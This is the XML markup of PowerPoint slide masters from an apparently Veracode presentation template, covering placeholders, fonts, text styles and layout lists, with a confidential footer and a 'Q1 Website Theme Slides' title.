      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C9E083-7B66-9640-9AA3-5E789A9B744B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84919F93-FB06-0640-96B4-3CA22BFC1C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB47DAD-F683-314D-BEA8-6038268298AC}"/>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64" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E605F8F2-3A59-3443-BA4B-D12AB12C6FE8}"/>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65" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B93C43F-7645-BB42-BE7C-FA753336CE48}"/>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66" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67C5208-1E93-E241-9943-9A09B557E6B0}"/>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67" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12AC3DC5-FD1C-A44A-88B5-6416653383A4}"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8168AC93-A797-E9CD-F950-AB7F9C283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Q1 Website Theme Slides</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2305680355"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484425" r:id="rId1"/>
    <p:sldLayoutId id="2147484426" r:id="rId2"/>
    <p:sldLayoutId id="2147484427" r:id="rId3"/>
    <p:sldLayoutId id="2147484428" r:id="rId4"/>
    <p:sldLayoutId id="2147484429" r:id="rId5"/>
    <p:sldLayoutId id="2147484430" r:id="rId6"/>
    <p:sldLayoutId id="2147484431" r:id="rId7"/>
    <p:sldLayoutId id="2147484432" r:id="rId8"/>
    <p:sldLayoutId id="2147484454" r:id="rId9"/>
    <p:sldLayoutId id="2147484455" r:id="rId10"/>
    <p:sldLayoutId id="2147484433" r:id="rId11"/>
    <p:sldLayoutId id="2147484434" r:id="rId12"/>
    <p:sldLayoutId id="2147484435" r:id="rId13"/>
    <p:sldLayoutId id="2147484436" r:id="rId14"/>
    <p:sldLayoutId id="2147484437" r:id="rId15"/>
    <p:sldLayoutId id="2147484438" r:id="rId16"/>
    <p:sldLayoutId id="2147484439" r:id="rId17"/>
    <p:sldLayoutId id="2147484440" r:id="rId18"/>
    <p:sldLayoutId id="2147484441" r:id="rId19"/>
    <p:sldLayoutId id="2147484442" r:id="rId20"/>
    <p:sldLayoutId id="2147484443" r:id="rId21"/>
    <p:sldLayoutId id="2147484444" r:id="rId22"/>
    <p:sldLayoutId id="2147484445" r:id="rId23"/>
    <p:sldLayoutId id="2147484446" r:id="rId24"/>
    <p:sldLayoutId id="2147484447" r:id="rId25"/>
    <p:sldLayoutId id="2147484448" r:id="rId26"/>
    <p:sldLayoutId id="2147484449" r:id="rId27"/>
    <p:sldLayoutId id="2147484450" r:id="rId28"/>
    <p:sldLayoutId id="2147484451" r:id="rId29"/>
    <p:sldLayoutId id="2147484452" r:id="rId30"/>
    <p:sldLayoutId id="2147484453" r:id="rId31"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4000" b="0" i="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Lato Light" panose="020F0302020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:tabLst/>
        <a:defRPr sz="2000" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="463550" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1800" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="630238" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="808038" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="857250" indent="-166688" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B070302020209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22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2" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2EB9A8-796F-A54A-A124-B8DEA39D67F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="4932493" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C9E083-7B66-9640-9AA3-5E789A9B744B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84919F93-FB06-0640-96B4-3CA22BFC1C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB47DAD-F683-314D-BEA8-6038268298AC}"/>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64" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E605F8F2-3A59-3443-BA4B-D12AB12C6FE8}"/>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65" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B93C43F-7645-BB42-BE7C-FA753336CE48}"/>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66" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67C5208-1E93-E241-9943-9A09B557E6B0}"/>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67" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12AC3DC5-FD1C-A44A-88B5-6416653383A4}"/>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grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4154327176"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484214" r:id="rId1"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4000" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Courier" pitchFamily="2" charset="0"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="1000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buNone/>
        <a:tabLst/>
        <a:defRPr sz="2000" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="463550" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1800" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="630238" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1600" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="808038" indent="-285750" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="857250" indent="-166688" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="100000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="500"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
        <a:buChar char="•"/>
        <a:tabLst/>
        <a:defRPr sz="1400" b="0" kern="1200">
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:latin typeface="Trebuchet MS" panose="020B070302020209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224"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2" name="Footer Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E2EB9A8-796F-A54A-A124-B8DEA39D67F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397496" y="6526743"/>
            <a:ext cx="2766117" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1100">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0703020202090204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>© Veracode, Inc. 2024 Confidential </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Slide Number Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26C9E083-7B66-9640-9AA3-5E789A9B744B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6526743"/>
            <a:ext cx="397497" cy="331257"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1100" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                    <a:lumOff val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{96D4B67A-9B17-1048-8026-E67E2528EF04}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Graphic 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84919F93-FB06-0640-96B4-3CA22BFC1C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10798550" y="6539461"/>
            <a:ext cx="1097276" cy="163367"/>
            <a:chOff x="9041039" y="6539461"/>
            <a:chExt cx="1097276" cy="163367"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="63" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB47DAD-F683-314D-BEA8-6038268298AC}"/>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64" name="Freeform 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E605F8F2-3A59-3443-BA4B-D12AB12C6FE8}"/>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65" name="Freeform 64">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B93C43F-7645-BB42-BE7C-FA753336CE48}"/>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66" name="Freeform 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F67C5208-1E93-E241-9943-9A09B557E6B0}"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Freeform 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12AC3DC5-FD1C-A44A-88B5-6416653383A4}"/>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chemeClr val="tx1"/>
            </a:solidFill>
            <a:ln w="1512" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" b="0" i="0">
                <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8168AC93-A797-E9CD-F950-AB7F9C2839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p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4154327176"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMap bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  <p:sldLayoutIdLst>
    <p:sldLayoutId id="2147484225" r:id="rId1"/>
    <p:sldLayoutId id="2147484231" r:id="rId2"/>
    <p:sldLayoutId id="2147484316" r:id="rId3"/>
    <p:sldLayoutId id="2147484323" r:id="rId4"/>
    <p:sldLayoutId id="2147484388" r:id="rId5"/>
    <p:sldLayoutId id="2147484389" r:id="rId6"/>
  </p:sldLayoutIdLst>
  <p:hf hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="4000" b="1" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="Lato" panose="020F0502020204030203" pitchFamily="34" charset="77"/>
          <a:ea typeface="+mj-ea"/>
